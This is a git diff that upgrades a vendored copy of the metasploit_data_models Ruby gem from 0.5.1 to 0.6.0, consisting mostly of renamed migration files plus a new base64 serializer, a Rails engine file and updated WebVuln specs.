lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110606000001_add_macros_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110622000000_add_settings_to_tasks_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110622000000_add_settings_to_tasks_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110624000001_add_listeners_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110624000001_add_listeners_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110625000001_add_macro_to_listeners_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110625000001_add_macro_to_listeners_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000001_add_nexpose_consoles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000001_add_nexpose_consoles_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110717000001_add_profiles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110717000001_add_profiles_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110727163801_expand_cred_ptype_column.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110727163801_expand_cred_ptype_column.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110730000001_add_initial_indexes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110730000001_add_initial_indexes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110812000001_prune_indexes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110812000001_prune_indexes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110922000000_expand_notes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110922000000_expand_notes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110928101300_add_mod_ref_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110928101300_add_mod_ref_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111011110000_add_display_name_to_reports_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111011110000_add_display_name_to_reports_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111203000000_inet_columns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111203000000_inet_columns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111204000000_more_inet_columns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111204000000_more_inet_columns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111210000000_add_scope_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111210000000_add_scope_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120126110000_add_virtual_host_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120126110000_add_virtual_host_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120411173220_rename_workspace_members.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120411173220_rename_workspace_members.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120601152442_add_counter_caches_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120601152442_add_counter_caches_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000000_add_vuln_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000000_add_vuln_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000001_add_host_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000001_add_host_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000002_expand_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000002_expand_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000003_expand_details2.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000003_expand_details2.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000004_add_vuln_attempts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000004_add_vuln_attempts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000006_add_module_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000006_add_module_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000007_add_exploit_attempts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000007_add_exploit_attempts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000008_add_fail_message.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000008_add_fail_message.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm/host/operating_system_normalization.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm/host/operating_system_normalization.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb new file mode 100755 index 0000000000..dfc0596b68 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb @@ -0,0 +1,103 @@ +# Provides ActiveRecord 3.1x-friendly serialization for descendants of +# ActiveRecord::Base. Backwards compatible with older YAML methods and +# will fall back to string decoding in the worst case +# +# @example Using default default of {} +# serialize :foo, MetasploitDataModels::Base64Serializer.new +# +# @example Overriding default to [] +# serialize :bar, MetasploitDataModels::Base64Serializer.new(:default => []) +# +module MetasploitDataModels + class Base64Serializer + # + # CONSTANTS + # + + # The default for {#default} + DEFAULT = {} + # Deserializers for {#load} + # 1. Base64 decoding and then unmarshalling the value. + # 2. Parsing the value as YAML. + # 3. The raw value. + LOADERS = [ + lambda { |serialized| + marshaled = serialized.unpack('m').first + # Load the unpacked Marshal object first + Marshal.load(marshaled) + }, + lambda { |serialized| + # Support legacy YAML encoding for existing data + YAML.load(serialized) + }, + lambda { |serialized| + # Fall back to string decoding + serialized + } + ] + + # + # Methods + # + + # Creates a duplicate of default value + # + # @return + def default + @default.dup + end + + attr_writer :default + + # Serializes the value by marshalling the value and then base64 encodes the marshaled value. + # + # @param value [Object] value to serialize + # @return [String] + def dump(value) + # Always store data back in the Marshal format + marshalled = Marshal.dump(value) + base64_encoded = [ marshalled ].pack('m') + + base64_encoded + end + + # @param attributes [Hash] attributes + # @option attributes [Object] :default ({}) Value to use for {#default}. + def initialize(attributes={}) + attributes.assert_valid_keys(:default) + + @default = attributes.fetch(:default, DEFAULT) + end + + # Deserializes the value by either + # 1. Base64 decoding and then unmarshalling the value. + # 2. Parsing the value as YAML. + # 3. Returns the raw value. + # + # @param value [String] serialized value + # @return [Object] + # + # @see #default + def load(value) + loaded = nil + + if value.blank? + loaded = default + else + LOADERS.each do |loader| + begin + loaded = loader.call(value) + rescue + next + else + break + end + end + end + + loaded + end + end +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb new file mode 100644 index 0000000000..4f73f5c985 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb @@ -0,0 +1,14 @@ +require 'rails' + +module MetasploitDataModels + class Engine < Rails::Engine + + # @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl + config.generators do |g| + g.assets false + g.fixture_replacement :factory_girl, :dir => 'spec/factories' + g.helper false + g.test_framework :rspec, :fixture => false + end + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/serialized_prefs.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/serialized_prefs.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/ip_format_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/ip_format_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb index ee7b61398b..6532b907d4 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb @@ -4,5 +4,5 @@ module MetasploitDataModels # metasploit-framework/data/sql/migrate to db/migrate in this project, not all models have specs that verify the # migrations (with have_db_column and have_db_index) and certain models may not be shared between metasploit-framework # and pro, so models may be removed in the future. Because of the unstable API the version should remain below 1.0.0 - VERSION = '0.5.1' + VERSION = '0.6.0' end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/metasploit_data_models.gemspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/metasploit_data_models.gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb similarity index 80% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb index d55706f947..904a19fe0b 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb @@ -5,6 +5,10 @@ describe Mdm::WebVuln do 1 .. 100 end + let(:default_params) do + [] + end + let(:methods) do [ 'GET', @@ -18,6 +22,10 @@ describe Mdm::WebVuln do 0 .. 5 end + subject(:web_vuln) do + described_class.new + end + context 'associations' do it { should belong_to(:web_site).class_name('Mdm::WebSite') } end @@ -74,7 +82,11 @@ describe Mdm::WebVuln do it { should ensure_inclusion_of(:method).in_array(methods) } it { should validate_presence_of :name } it { should validate_presence_of :path } - it { should validate_presence_of :params } + + it 'should not validate presence of params because it default to [] and can never be nil' do + web_vuln.should_not validate_presence_of(:params) + end + it { should validate_presence_of :pname } it { should validate_presence_of :proof } it { should ensure_inclusion_of(:risk).in_range(risk_range) } @@ -84,4 +96,31 @@ describe Mdm::WebVuln do context 'serializations' do it { should serialize(:params).as_instance_of(MetasploitDataModels::Base64Serializer) } end + + context '#params' do + let(:default) do + [] + end + + let(:params) do + web_vuln.params + end + + it 'should default to []' do + params.should == default + end + + it 'should return default if set to nil' do + web_vuln.params = nil + web_vuln.params.should == default + end + + it 'should return default if set to nil and saved' do + web_vuln = FactoryGirl.build(:mdm_web_vuln) + web_vuln.params = nil + web_vuln.save! + + web_vuln.params.should == default + end + end end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/javascripts/application.js similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/javascripts/application.js diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/stylesheets/application.css similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/stylesheets/application.css diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/controllers/application_controller.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/controllers/application_controller.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/helpers/application_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/helpers/application_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/mailers/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/mailers/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/models/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/models/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/views/layouts/application.html.erb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/views/layouts/application.html.erb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config.ru similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config.ru diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb 